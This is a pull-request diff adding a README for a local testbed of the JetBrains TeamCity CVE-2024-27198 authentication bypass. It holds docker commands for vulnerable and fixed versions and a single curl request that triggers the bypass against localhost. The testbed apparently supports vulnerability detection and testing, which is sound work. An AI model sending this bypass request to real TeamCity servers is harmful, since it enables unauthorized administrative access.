Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
26 changes: 26 additions & 0 deletions jetbrains/teamcity/CVE-2024-27198/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
# JetBrains TeamCity CVE-2024-27198

These are the deployment instructions for JetBrains TeamCity - CVE-2024-27198 testbed. Versions prior to 2023.11.4 are affected by an authentication bypass vulnerability that allows attackers to perform administrative actions.

## How to Trigger the Vulnerability?

To trigger the vulnerability, you can use the following curl command. Since this vulnerability is an authentication bypass vulnerability, you should see the version info (like `version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11"`) in the response for vulnerable instances.

Curl Request:

```sh
curl -v "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*"
```
## Fixed version
```sh
docker run -it --rm --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4
```

The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough.

## Vulnerable version
```sh
docker run -it --rm --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
```

The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough.